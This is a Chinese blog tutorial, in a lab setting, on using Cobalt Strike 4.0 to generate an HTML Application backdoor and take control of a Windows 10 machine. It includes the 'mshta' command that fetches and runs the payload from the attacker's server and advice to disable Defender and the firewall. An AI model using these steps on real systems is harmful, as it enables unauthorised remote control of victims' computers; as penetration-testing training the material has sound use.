CobaltStrike4.0教程-HTML Application

最新推荐文章于 2024-05-05 18:21:20 发布
最新推荐文章于 2024-05-05 18:21:20 发布
阅读量308 收藏
点赞数
文章标签: 安全 linux 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_26383841/article/details/132024312
版权

CobaltStrike4.0教程-HTML Application

一、什么是CobaltStrike?

Cobalt Strike是一款专业的渗透测试工具,常用于网络攻击和红队行动。它最初作为Metasploit框架的商业扩展版本,由Raphael Mudge开发并由SpecterOps团队维护。
Cobalt Strike提供了多种功能和特性,以帮助安全专业人员模拟真实世界中的攻击,并评估目标网络的安全性。其主要功能包括:

  1. 命令与控制(C2):Cobalt Strike提供了一个灵活强大的命令与控制平台,允许渗透测试人员通过远程访问受感染系统、执行命令、获取目标信息等进行操控。
  2. 社交工程:该工具集成了多种社交工程模块,如钓鱼攻击、恶意文件生成等,以便诱骗用户点击链接或打开恶意附件。这有助于测试组织在面对此类攻击时的防御能力。
  3. 漏洞利用:Cobalt Strike支持多种漏洞利用技术,并集成了Metasploit框架的强大漏洞利用模块。这使得渗透测试人员可以有效地定位和利用系统中存在的漏洞。
  4. 持久性和横向移动:Cobalt Strike提供了多种技术,如后门、持久化脚本和横向移动工具,以帮助渗透测试人员在受感染系统中保持访问权限,并探索目标网络中的其他系统。

二、功能简介

在这里插入图片描述

文件功能
agscript扩展应用的脚本
c2lint用于检查profile的错误和异常
teamserver服务器端启动程序
cobaltstrike.jarCobaltStrike核心程序
cobaltstrike.auth用于客户端和服务器端认证的文件,客户端和服务端有一个一模一样的
cobaltstrike.storeSSL秘钥库,可以使用keytool(Java数据证书管理工具)进行修改
start.sh运行客户端的shell脚本,与cobaltstrike作用相同
目录功能
data用于保存当前TeamServer的一些数据
logs日志文件,包括Web日志、Beacon日志、截图日志、下载日志、键盘记录日志等
third-party第三方工具目录
uploads上传文件的目录

三、实验环境

kali cs服务端 192.168.57.142(服务端通常运行在Linux环境)

kali cs客户端 192.168.57.142( 可以跨平台,运行在Linux/Windows环境,启动后在对话框输入服务端的ip和连接密码,名字自定义 )

windows10 靶机 192.168.57.148

在这里插入图片描述

在这里插入图片描述

四、实验过程

在桌面打开终端,进入root模式,打开CobaltStrike文件夹

在这里插入图片描述

4.1 启动cs的服务端

./teamserver 192.168.xxx.xxx passwd   #这里passwd随便填得记住 待会连接客户端得用

在这里插入图片描述

4.2 另外开启一终端,打开cs的客户端

./start.sh

会跳出cs的连接界面:

  • HOST 为我们刚刚建立服务器的IP地址
  • PORT 为端口号 (端口不用管 默认就可以)
  • USER 为用户名 (默认另取都可以)
  • Password 为登录密码 (刚才设置的服务端passwd)

在这里插入图片描述

连接成功后会看到一段话:user has joined.

在这里插入图片描述

CobaltStrike模块功能
New Connection打开一个新连接窗口
Preferences偏好设置,就是设置CobaltStrike外观的
Visualization将主机以不同的权限展示出来(主要以输出结果的形式展示)
VPN Interfaces设置VPN接口
Listeners创建监听器
Script Interfaces查看和加载CNA脚本

4.3 创建监听器Listener

Beacon为内置监听器(支持异步通信和交互式通信),Foreign为外置监听器。

点击左上方CobaltStrike选项—>下拉框选中 Listeners —>在下方弹出区域中单机add

在这里插入图片描述

4.4 创建攻击Attacks(生成后门)

在这里插入图片描述

在这里插入图片描述

会自动生成一个hta文件

在这里插入图片描述

在这里插入图片描述

4.5 提供端口下载文件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

4.6 在靶机执行远程命令

mshta http://1932.168.57.142:10066/download/file.ext

在这里插入图片描述

可以看到此时靶机上线

在这里插入图片描述

特别注意:要把win10的防火墙和defender都关掉,不然很容易被杀掉

在这里插入图片描述

在这里插入图片描述

4.7 攻击目标主机

当有目标主机以任何方式运行了生成的被控端,出现在主机列表,选中要操作的目标主机,右键interact进入交与命令界面,在此使用Beacon Commands对目标主机执行各种操作。

在这里插入图片描述

设置sleep 0
执行shell命令 shell ipconfig

在这里插入图片描述

成功上线,这里有一个我比较疑惑的点是:在攻击之前win10的IP地址是192.168.57.148,执行了远程命令后IP地址变成了192.168.57.151,但不影响攻击结果。

4.8 操控目标机器

eg:任务管理器(文件管理、远程桌面、屏幕截图等)

在这里插入图片描述

地址是192.168.57.148,执行了远程命令后IP地址变成了192.168.57.151,但不影响攻击结果。

4.9 操控目标机器

eg:任务管理器(文件管理、远程桌面、屏幕截图等)

在这里插入图片描述

Yoomay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Cobalt Strike beacon详解
qq_38348692的博客
08-18 3446
这篇文章接着上一篇weblogic漏洞拿到beacon开始写的,拿beacon的过程详细请看上上一篇文章:[WebLogic wls9-async 反序列化漏洞(CNVD-C-2019-48814)复现](https://blog.csdn.net/qq_38348692/article/details/99676809)。 beacon 中输入和help,查看所有的命令,及翻译: Beaco...
CS4.9.1.1-CobaltStrike4.9.1.1版
01-18
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
Cobalt Strike 4.9
剁椒鱼头没剁椒的博客
10-10 3422
CS 是Cobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
2024年最全centos云服务器安装cs(cobaltstrike4,2024网络安全开发面试题及答案
最新发布
2401_84520026的博客
05-05 716
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CobaltStrike4.0渗透工具cs下载、安装和使用教程
qq_39972370的博客
08-10 8900
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。主要是用来后期持久渗透、横向移动、流量隐藏、数据窃取的工具。当已经在目标机器上执行了CS的payload,它会创建一个Beacon(远控木马功能)回连到C2服务器。
CobaltStrike4.0 安装教程+基础教程
热门推荐
weixin_47830774的博客
12-12 1万+
obaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
AccessControl-4.0b5-cp35-cp35m-win32.whl.zip
04-06
《AccessControl-4.0b5-cp35-cp35m-win32.whl.zip:Python包管理与访问控制解析》 在Python开发环境中,有效地管理和控制对各种资源的访问是至关重要的,这就是`AccessControl`库的用武之地。`AccessControl-4.0b5-...
AccessControl-4.0b3-cp35-cp35m-win32.whl.zip
04-01
标题中的"AccessControl-4.0b3-cp35-cp35m-win32.whl.zip"是一个Python库的发行版本,其中包含了特定版本的AccessControl模块。这个名称包含了许多关键信息: 1. **AccessControl**:这是库的名字,意味着这个文件...
AccessControl-4.0b5-cp27-cp27m-win_amd64.whl.zip
04-06
标题中的"AccessControl-4.0b5-cp27-cp27m-win_amd64.whl.zip"指的是一个Python库的压缩包文件,名为"AccessControl"的版本为4.0b5,针对Python 2.7版本(标记为`cp27`)并具有`cp27m`的 ABI(Application Binary ...
AccessControl-4.0b7-cp36-cp36m-win_amd64.whl.zip
04-06
标题中的"AccessControl-4.0b7-cp36-cp36m-win_amd64.whl.zip"是一个Python软件包的压缩文件,它主要用于Python环境中的访问控制(Access Control)模块。这个包的版本是4.0b7,意味着这是一个beta测试版,即在正式...
AccessControl-4.0b6-cp35-cp35m-win32.whl.zip
04-06
标题中的"AccessControl-4.0b6-cp35-cp35m-win32.whl.zip"表明这是一个Python的软件包,其中包含了AccessControl的4.0b6版本,适配Python 3.5解释器(cp35表示Python 3.5,cp35m是编译模式),并且是为Windows 32位...
网络安全周宣传活动总结(通用15篇).pdf
06-20
。。。
CobaltStrike V4.zip
03-20
Cobalt Strike is software for Adversary Simulations and Red Team Operations.
CobaltStrike4.0用户手册_中文翻译-带书签.pdf
04-20
CobaltStrike4.0用户手册_中文翻译-带书签
Cobalt Strike环境搭建
zzlx123的博客
01-22 1383
Cobalt Strike环境搭建 0x01 Cobalt Strike介绍 Cobalt Strike是一款美国Red Team开发的渗透测试神器,被圈内人称为CS。CS分为服务端和客户端,为一对多的工作模式,团队可分布式协作操作。 Cobalt Strike集成了提权,凭据导出,端口转发,socket代理,office攻击,windows exe 木马生成,windows dll 木马生成,java 木马生成,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具
Cobalt Strike 4.0渗透攻击工具
tlovejr的博客
03-30 4527
前言 前几天在做综合靶场的时候,有一个不太完整的vulntarget-a综合靶场,在这里我用了cs工具那么今天就给大家简单的说一下这个工具 1、工具简介 Cobalt Strike是一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。 Cobalt Strike主要用于团队作战,可
Cobalt Strike 4.9.1(已更新,文章图片没换)
剁椒鱼头没剁椒的博客
03-06 2073
CS 是Cobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
最新CobaltStrike4.8/CobaltStrike4.9、CS4.9/CS4.8、 Windows/Linux/Mac版下载
weixin_43167326的博客
12-28 2725
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,
yarn logs -applicationId application_
05-30
yarn logs -applicationId application_ 是用于查看 YARN 应用程序日志的命令,其中 application_ 后面是应用程序的 ID。 如果你知道应用程序的 ID,可以使用上述命令查看应用程序的日志。例如,要查看应用程序 ID 为“application_1234567890000_0001”的日志,可以使用以下命令: ``` yarn logs -applicationId application_1234567890000_0001 ``` 该命令将输出与应用程序相关的日志信息,包括标准输出和标准错误输出。你可以将输出保存到文件中进行分析,例如: ``` yarn logs -applicationId application_1234567890000_0001 > app_log.txt ``` 请注意,此命令仅适用于正在运行的应用程序和最近完成的应用程序。如果应用程序已经完成或已经被杀死,则将无法使用此命令查看日志。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值